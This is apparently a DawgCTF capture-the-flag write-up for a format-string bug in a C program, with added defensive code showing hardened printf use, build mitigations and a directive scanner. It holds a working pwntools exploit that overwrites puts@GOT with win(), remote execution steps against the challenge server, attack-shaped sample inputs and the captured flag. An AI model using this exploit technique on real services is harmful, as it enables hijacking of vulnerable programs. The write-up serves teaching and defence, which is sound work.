just_print_it

Challenge

Imported from local notes.md.

Solution

Original Notes

just_print_it

Challenge Summary

  • Given: A remote TCP service at nc.umbccd.net:8925 and the published source code for a small C program.
  • Goal: Make the service print the real flag.
  • Constraints: Single line of input, no source changes on the remote side, standard DawgCTF flag format.

Initial Recon / Triage

  • Observations: main() reads a line into buffer, then calls printf(buffer), followed by puts("\nGoodbye!"). This is a direct format-string vulnerability.
  • File identification: The published build flags disable PIE, so code addresses are fixed. win() exists and prints flag.txt before exiting.
  • Entry points: The user-controlled buffer reaches printf as the format argument itself rather than as data, so %n directives in the input can be used to overwrite memory.

Hypotheses & Approach

  • Hypothesis 1: Because the binary is non-PIE, overwriting a GOT entry with the fixed address of win() should be enough to redirect control flow.
  • Hypothesis 2: Overwriting puts@GOT is ideal because the program calls puts("\nGoodbye!") immediately after printf(buffer), so the hijack triggers right away without needing a return-oriented payload.
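As an added defensive example, not part of the original notes: the vulnerable printf pattern from the recon section beside its hardened form, plus a small directive scanner that a service front-end or log monitor could use to flag untrusted input carrying format conversions (the build-flag comment covers the RELRO/PIE point behind Hypothesis 1). The function names, the scan structure and the sample inputs are my own constructions, not code from the challenge.

```c
#include <stdio.h>
#include <string.h>

/* Build-time mitigations for the two weaknesses the notes rely on:
 *   -Wformat -Wformat-security      warns on printf(buffer) with no literal format
 *   -O2 -D_FORTIFY_SOURCE=2         glibc aborts on %n when the format lives in writable memory
 *   -Wl,-z,relro,-z,now (full RELRO) makes the GOT read-only after loading, so puts@GOT cannot be overwritten
 *   -fPIE -pie                      randomizes the address of win() per run
 */

/* Vulnerable pattern from the write-up, kept only for contrast: the user
 * buffer becomes the format string, so %n can write memory and %p can leak it. */
void echo_vulnerable(const char *buffer) {
    printf(buffer);
    puts("\nGoodbye!");
}

/* Hardened form: the format string is a constant and user data is an argument. */
void echo_hardened(const char *buffer) {
    printf("%s", buffer);
    puts("\nGoodbye!");
}

/* Result of scanning one input for printf-style conversion directives. */
typedef struct {
    int directives;   /* conversions found, excluding the literal "%%" */
    int writes;       /* %n conversions: the only ones that write memory */
    int positional;   /* "%<k>$..." conversions, the shape a stack-offset exploit uses */
} fmt_scan_t;

/* Walk the string the way printf would: '%' then optional flags, width,
 * precision, positional marker and length modifier, then the conversion. */
fmt_scan_t scan_format_directives(const char *s) {
    fmt_scan_t r = {0, 0, 0};
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;                 /* "%%" prints a literal percent */
        const char *start = p;
        while (*p && strchr("-+ #0123456789.$hlLqjzt", *p)) p++;
        if (!*p) break;                          /* dangling '%' at end of input */
        r.directives++;
        if (*p == 'n') r.writes++;
        if (memchr(start, '$', (size_t)(p - start))) r.positional++;
    }
    return r;
}

/* Policy check for a field that should never contain format directives. */
int is_plain_text(const char *s) {
    return scan_format_directives(s).directives == 0;
}

int main(void) {
    /* Constructed sample inputs, not captured traffic. */
    const char *samples[] = {
        "hello from a normal user",
        "100% done",        /* "% d" is a real directive as printf parses it */
        "100%",             /* dangling percent: malformed, but no conversion */
        "%p %p %p %p",      /* stack leak shape */
        "AAAA%6$hn",        /* positional short write shape */
    };
    for (size_t i = 0; i < sizeof samples / sizeof *samples; i++) {
        fmt_scan_t r = scan_format_directives(samples[i]);
        printf("%-26s directives=%d writes=%d positional=%d plain=%d\n",
               samples[i], r.directives, r.writes, r.positional,
               is_plain_text(samples[i]));
    }
    /* With the hardened echo the directive is printed literally. */
    echo_hardened("AAAA%6$hn");
    return 0;
}
```

The scanner mirrors printf's own parsing rather than just counting '%' characters, which is why "100% done" registers as one directive: printf would consume an argument for "% d" too, so a plain-text check has to reject it.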

Execution Steps (Reproducible)

Stage 1

Commands:

cd /root/dawg2026CTF/just_print_it/artifacts
python3 - <<'PY'
# Requires pwntools; context.binary loads the local replica as an ELF object.
from pwn import *
context.binary = './just_print_it'   # non-PIE build, so GOT and win() addresses are fixed
elf = context.binary
# Format-string write at stack offset 6: short (%hn) writes replace puts@GOT with the address of win()
payload = fmtstr_payload(6, {elf.got['puts']: elf.symbols['win']}, write_size='short')
print('payload_len', len(payload))
print(enhex(payload))
p = process('./just_print_it')       # validate locally first; Stage 2 sends the same payload remotely
p.sendline(payload)
print(p.recvall(timeout=1).decode('latin1', errors='replace'))
PY

Results:

  • Verified the stack offset is 6 and that a short %n write can replace puts@GOT with win.
  • Local binary details used for the exploit: win = 0x401196, puts@GOT = 0x404000.
  • Local validation printed the placeholder local flag and confirmed the control-flow redirection worked.

Stage 2

Commands:

cd /root/dawg2026CTF/just_print_it/artifacts
python3 exploit.py

Results:

  • The same format-string payload was sent to nc.umbccd.net:8925.
  • The remote service responded with the real flag: DawgCTF{s3v3r_PWNed!}.

Artifacts Produced

  • artifacts/exploit.py - reusable remote exploit.
  • artifacts/just_print_it - local replica used to validate the overwrite.
  • artifacts/core.347405 - crash/core artifact from local testing.

Flag

DawgCTF{s3v3r_PWNed!}